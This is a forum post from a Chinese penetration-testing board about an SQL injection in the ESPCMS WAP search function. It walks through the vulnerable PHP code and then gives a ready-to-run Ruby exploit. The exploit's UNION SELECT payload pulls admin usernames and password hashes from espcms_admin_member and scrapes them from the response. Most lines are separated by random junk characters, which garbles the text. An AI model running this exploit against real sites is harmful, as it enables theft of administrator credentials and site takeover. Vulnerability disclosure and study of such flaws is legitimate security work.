中国网络渗透测试联盟
标题:
espcms wap模块搜索处SQL注入
[打印本页]
作者:
admin
时间:
2013-7-27 18:31
标题:
espcms wap模块搜索处SQL注入
0×0 漏洞概述0×1 漏洞细节
: Y7 y0 w8 W6 \. \' }& c& Y5 E$ t* B
0×2 PoC
( ~+ w" h( o# P2 @, c* m
! m4 l+ t- v$ n J3 L
. }& b5 A2 I0 y: q. P! U% z6 ~
: S1 {0 u6 Z3 K6 N: h' y" ~4 `( `
0×0 漏洞概述
: [8 N4 e" }) W5 p/ A4 Q
( @8 j* `9 d8 o0 _
易思ESPCMS企业网站管理系统基于LAMP开发构建的企业网站管理系统,它具有操作简单、功能强大、稳定性好、扩展性及安全性强、二次开发及后期维护方便,可以帮您迅速、轻松地构建起一个强大专业的企业网站。
! [% c/ Q) p! U" `
其在处理传入的参数时考虑不严谨导致
SQL注入
发生
4 a5 \* s4 v& X( g5 r
% ]! |$ ^' T% _( B9 _$ ?
9 O( l7 B6 J1 V/ v' N2 K: T7 b: O+ P
0×1 漏洞细节
( T* D9 r R4 X. S. z. i) D+ o
0 l4 D/ u+ M6 x% m$ L4 W
变量的传递过程是$_SERVER['QUERY_STRING']->$urlcode->$output->$value->$db_where->$sql->mysql_query,整个过程无过滤导致了注入的发生。
0 Q1 O6 t. e% q' c! u4 `
正因为变量是从$_SERVER['QUERY_STRING']中去取的,所以正好避开了程序的过滤。
6 O3 d+ p( r1 y2 C' j m3 c* `3 w
而注入的变量是数组的值,并非数组的key,所以也没过被过滤,综合起来形成了一个比较少见的
SQL注入
。
" B0 n3 ~7 X5 k& n
9 e6 f0 X; N/ `7 i
在/interface/3gwap_search.php文件的in_result函数中:
t( r1 d4 P4 f# R+ ~& [
5 q( M4 c- ]: C, d1 X( I* }2 L
. x f( |+ `& ?( u" G) x
$ I, n) Z/ C7 [, `' W( p
function in_result() {
6 b, n3 v8 ^# g1 |& ~/ s' r7 m$ i- u8 v
... ... ... ... ... ... ... ... ...
* @* D$ @& P, A, q. s; B
$urlcode = $_SERVER[ 'QUERY_STRING '];
% C' O2 ^8 {9 G& ~6 e7 y8 T
parse_str(html_entity_decode($urlcode), $output);
4 l; Z- B' `7 s5 D
& w, S1 O0 X( j k1 |
... ... ... ... ... ... ... ... ...
2 A$ F- I2 U, K* C; \( F+ J
if (is_array($output['attr' ]) && count($output['attr']) > 0) {
6 h" h* x' u0 l9 ?
- `! ?. x8 H8 q( o5 I
$db_table = db_prefix . 'model_att';
3 H3 s6 X/ s: k" T* W
) Q: J l; i: T3 b& \6 l3 E
foreach ($output['attr' ] as $key => $value) {
# Z9 K: ]! x3 d, j% E4 t, H
if ($value) {
. h! ~1 N+ ~; P# q. \
3 L' t/ C( h4 K N( j
$key = addslashes($key);
1 M9 k5 Q+ |8 g& t) _, d* X+ g& G
$key = $this-> fun->inputcodetrim($key);
7 E' n: w8 {6 [
$db_att_where = " WHERE isclass=1 AND attrname='$key'";
X0 N' K( d6 x1 [4 R
$countnum = $this->db_numrows($db_table, $db_att_where);
' T& t) M* r P. e
if ($countnum > 0) {
; e6 @; k# }' M" G' ~
$db_where .= ' AND b.' . $key . '=\'' . $value . '\'' ;
1 e9 \. U* X$ S/ L$ V6 y7 W
}
6 X/ ^' p/ J7 i3 X
}
5 B" P& D- ~2 c+ D+ v9 r
}
; m8 e3 ?# f+ E. a* f
}
' t7 _+ O. M: |* N
if (!empty ($keyword) && empty($keyname)) {
( n4 o" u0 C7 \+ I, }# D2 A3 K* Z6 \
$keyname = 'title';
]9 e, m9 g6 f$ ~2 L; x
$db_where.= " AND a.title like '%$keyword%'" ;
, w( |, S; c' ~8 R$ P% V
} elseif (!empty ($keyword) && !empty($keyname)) {
+ s. T7 m3 m* _5 T! b
$db_where.= " AND $keyname like '% $keyword%'";
. |. ^- U* x: a( n# s
}
$ g( c+ z+ Z% K' o
$pagemax = 15;
* g; x3 Z9 K7 n8 p' P
; t* `0 [, H, }, f) Z- j
$pagesylte = 1;
, C& p# N' Y# L( ?# B6 F
) [+ ]/ q4 ^/ _3 D
if ($countnum > 0) {
& j% g! U& ]: C4 e2 D" D" q; M
4 N3 T2 C+ G0 ^6 r; `% Z
$numpage = ceil($countnum / $pagemax);
2 `, u' m. _* D/ R6 c- E0 L. s1 G6 c
} else {
9 ~. J2 g+ e5 D5 l1 ?3 l
$numpage = 1;
7 [. L. P% Y' ~. u. U
}
; Y! t9 ~5 D' R( W, @ \
$sql = "SELECT b.*,a.* FROM " . db_prefix . "document AS a LEFT JOIN " . db_prefix . "document_attr AS b ON a.did=b.did " . $db_where . ' LIMIT 0,' . $pagemax;
( q. p" \9 ?( j5 n. @- p! ?2 Q
$this-> htmlpage = new PageBotton($sql, $pagemax, $page, $countnum, $numpage, $pagesylte, $this->CON ['file_fileex' ], 5, $this->lng['pagebotton' ], $this->lng['gopageurl'], 0);
$ F' W$ V; c; h! J
$sql = $this-> htmlpage->PageSQL('a.did' , 'down' ); $rs = $this->db->query($sql);
. ~) s+ t% V! \
... ... ... ... ... ... ... ... ...
" R0 _5 ]/ I0 P% e4 Y# U/ n
}
+ t9 T8 F7 x" G& f1 L) P8 D
6 O. a) h% [6 z8 y q- U
6 Z, P& ?, ?( A) m; K
0×2 PoC
( g! `( o: _1 v2 j' V
5 }5 y1 L+ c9 {- c( W
4 m) ~, @3 D- Q' S7 J
W! s! n" k! x% X
require "net/http"
' b" R G5 {( A, ~ ~" q
4 } D1 c g6 T2 k( L7 K" A; Y/ A
def request(method, url)
5 N& p" {; i' h2 r6 x" W! e
if method.eql?("get")
+ r5 f; T0 l. s- x3 ]" b, a0 e
uri = URI.parse(url)
% Y6 m7 M6 H* W9 C) f
http = Net::HTTP.new(uri.host, uri.port)
: H# A/ V8 y2 b- G
response = http.request(Net::HTTP::Get.new(uri.request_uri))
( Q# p4 F3 S5 r4 ?
return response
/ x- j! ?* y; v, h
end
% d' H* @) N3 M/ k" g( {7 k5 e) d
end
3 v/ g6 o0 r# p+ b
( U4 A/ e4 U. D; N
doc =<<HERE
1 k; m: Z" D( ^3 P- L! C
-------------------------------------------------------
: X8 ~) X- r6 X% i6 E$ J# X
Espcms Injection Exploit
! V' w$ V2 i9 e& X, A# E0 I
Author:ztz
4 [9 d9 q# `. z. B
Blog:
http://ztz.fuzzexp.org/
" d$ U7 Z8 Y7 Z
-------------------------------------------------------
$ H) N$ D9 _# j8 _- e' ^( p
6 y& v7 y0 s+ g% A
HERE
2 O$ y# N5 T! m: B- [( `
: \7 N5 p# j; Q
usage =<<HERE
2 R/ w& p2 S$ L- r9 n! e( P
Usage: ruby #{$0} host port path
2 H% {8 p- x% T8 ^: \
example: ruby #{$0}
www.target.com
80 /
" ]7 h# @$ p6 P1 I; ?, g
HERE
% E5 @0 D$ N: @+ b( Y
; K: ?0 |% G' L& v" u# Z
puts doc
% ~1 Q# W+ S8 v! ]2 R6 |
if ARGV.length < 3
$ U* g) V2 c4 E( L( s3 ~
puts usage
6 O$ I A7 J: ]+ O/ b' u
else
! W7 M# C! z- \' u& A% G
$host = ARGV[0]
+ o2 u9 u7 s0 s' p$ T6 i+ R, U
$port = ARGV[1]
( ^6 c; E1 O; k- w2 H$ h* z
$path = ARGV[2]
7 l" t/ C9 t& O0 p
! U7 C! G. j3 g; K- H* l. o+ [
puts "
send request..."
& U6 O `& l3 s2 f
url = "http://#{$host}:#{$port}#{$path}wap/index.php?ac=search&at=result&lng=cn&mid=3&tid=11&keyword=1&keyname=a.title&countnum=1&
. }0 k) I5 O" v9 H* I
attr[jobnum]=1%27%20and%201=2%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13
/ b* h/ B+ s, v( O3 J$ ]4 Q
,14,15,16,17,18,19,20,21,22,23,24,25,concat%28username,CHAR%2838%29,password%29,27
" x N q1 t* O4 t& A
,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45%20from%20espcms_admin_member;%23"
2 Y9 _9 K3 n% e0 c
response = request("get", url)
3 q' @4 |# Q0 I/ x7 I+ z+ H. A6 z
result = response.body.scan(/\w+&\w{32}/)
: ]* B0 d0 k. f/ M7 E
puts result
' ~6 @, k- Y3 {+ D; O% S- S' U$ ]
end
0 Q; f8 s3 j5 S
7 k& N0 \8 k, V4 z
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2